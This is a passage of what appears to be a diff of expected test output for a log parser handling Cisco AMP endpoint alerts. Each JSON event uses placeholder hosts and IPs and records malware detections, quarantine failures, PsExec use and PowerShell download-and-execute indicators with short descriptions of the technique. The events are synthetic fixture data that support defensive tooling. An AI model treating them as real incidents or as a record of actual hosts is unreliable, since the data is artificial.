+ "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1458617561791000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:03:40.000Z", + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "file.path": "/c:/users/rsteadman/downloads/report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + 
"host.name": "Demo_Low_Prev_Retro", + "input.type": "log", + "log.offset": 19558, + "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:01:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "be:b0:d5:89:e2:96" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6880587034675642558", + "cisco.amp.error.description": "Object path not found", + "cisco.amp.error.error_code": 3221225530, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Unknown", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "be:b0:d5:89:e2:96" + ], + "cisco.amp.timestamp_nanoseconds": 396000000, + "event.action": "Quarantine Failure", + "event.dataset": "cisco.amp", + "event.id": 6880587034675643000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e", + "fileset.name": "amp", + "host.hostname": "Demo_BP_WMIPRVSE", + "host.name": "Demo_BP_WMIPRVSE", + "input.type": "log", + "log.offset": 21167, + "related.hash": [ + "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" + ], + "related.hosts": [ + "Demo_BP_WMIPRVSE" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:01:50.000Z", + "cisco.amp.computer.active": true, + 
"cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "be:b0:d5:89:e2:96" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Generic.Malware.WX.9E93D282", + "cisco.amp.detection_id": "6880587021790740668", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Unknown", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "be:b0:d5:89:e2:96" + ], + "cisco.amp.timestamp_nanoseconds": 737000000, + "event.action": "Threat Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 6880587030380676000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48", + "file.name": "p3fci4nu.dll", + "file.path": "\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll", + "fileset.name": "amp", + "host.hostname": "Demo_BP_WMIPRVSE", + "host.name": "Demo_BP_WMIPRVSE", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 27082, + "process.hash.md5": "23ee3d381cfe3b9f6229483e2ce2f9e1", + "process.hash.sha1": "93cf877f5627e55ec076a656e935042fac39950e", + "process.hash.sha256": "4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57", + "process.name": "csc.exe", + "process.pid": 6708, + "related.hash": [ + "1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48" + ], + "related.hosts": [ + "Demo_BP_WMIPRVSE" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T09:56:55.000Z", + "cisco.amp.cloud_ioc.description": "The 
psexec utility was executed as admin.", + "cisco.amp.cloud_ioc.short_description": "W32.PsexecAsAdmin.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 615000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 460392585524661250, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T09:56:55.000Z", + "file.hash.sha256": "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef", + "file.name": "PsExec.exe", + "file.path": "file:///C%3A/share%24/PsExec.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 28604, + "process.hash.sha256": "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386", + "related.hash": [ + "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T07:56:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": 
"test_connector_guid", + "cisco.amp.event_type_id": 553648173, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 758406329, + "event.action": "File Fetch Completed", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508191586038317000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "file.hash.md5": "41476df3138717868118d8542cf3d1d6", + "file.hash.sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b", + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 30050, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T05:49:06.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. 
Malware authors may use this technique to bypass antivirus tools.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellEncodedBuffer.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 403000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 7007136035192884000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T05:49:06.000Z", + "file.hash.sha256": "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8", + "file.name": "powershell.exe", + "file.path": "file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 31276, + "process.hash.sha256": "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8", + "related.hash": [ + "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T00:37:44.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": 
"38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296278, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "event.action": "Threat Detected in Low Prevalence Executable", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1515350231459808800, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 33023, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T00:27:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648173, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 579890366, + "event.action": "File Fetch Completed", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508191586038317000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "file.hash.md5": "41476df3138717868118d8542cf3d1d6", + "file.hash.sha1": 
"5ca4bef8de6def53519d4b22632675bb4c1e470b", + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 34132, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T00:02:08.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 614000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6583671182384431000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 35358, + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + 
"cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411132837046517762", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 695000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 36288, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411132837046517761", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 691000000, + 
"event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 37489, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:37:33.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2014-0260", + "CVE-2014-1761", + "CVE-2014-6357", + "CVE-2015-0085", + "CVE-2015-0086", + "CVE-2015-1641", + "CVE-2015-1650", + "CVE-2015-1682", + "CVE-2015-2379", + "CVE-2015-2380", + "CVE-2015-2424", + "CVE-2016-0127", + "CVE-2016-7193", + "CVE-2017-0292", + "CVE-2017-11826" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2014-0260", + "name": "Microsoft Office", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260", + "version": "2013" + }, + { + "cve": "CVE-2014-1761", + "score": "9.3", + "url": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761" + }, + { + "cve": "CVE-2014-6357", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357" + }, + { + "cve": "CVE-2015-0085", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085" + }, + { + "cve": "CVE-2015-0086", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086" + }, + { + "cve": "CVE-2015-1641", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641" + }, + { + "cve": "CVE-2015-1650", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650" + }, + { + "cve": "CVE-2015-1682", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682" + }, + { + "cve": "CVE-2015-2379", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379" + }, + { + "cve": "CVE-2015-2380", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380" + }, + { + "cve": "CVE-2015-2424", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424" + }, + { + "cve": "CVE-2016-0127", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127" + }, + { + "cve": "CVE-2016-7193", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193" + }, + { + "cve": "CVE-2017-0292", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292" + }, + { + "cve": "CVE-2017-11826", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15152998206589, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2021-01-13T10:37:33.000Z", + 
"file.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", + "file.name": "WINWORD.EXE", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 41214, + "process.hash.sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef", + "related.hash": [ + "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:23:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 349000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6508159571352093000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 44193, + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:13:13.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 312509000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1515298360312529000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-13T10:13:13.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "PowerShell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 45111, + "process.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:13:08.000Z", + "cisco.amp.cloud_ioc.description": "Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.", + "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 162019000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1515298355162029000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-13T10:13:08.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "PowerShell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 46862, + "process.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:00:07.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6508153524038139905", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 606000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508153524038140000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 48509, + "related.hash": [ + "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-12T10:24:47.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 693632000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521062325693667300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-12T10:24:47.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "input.type": "log", + "log.offset": 49613, + "process.hash.sha256": 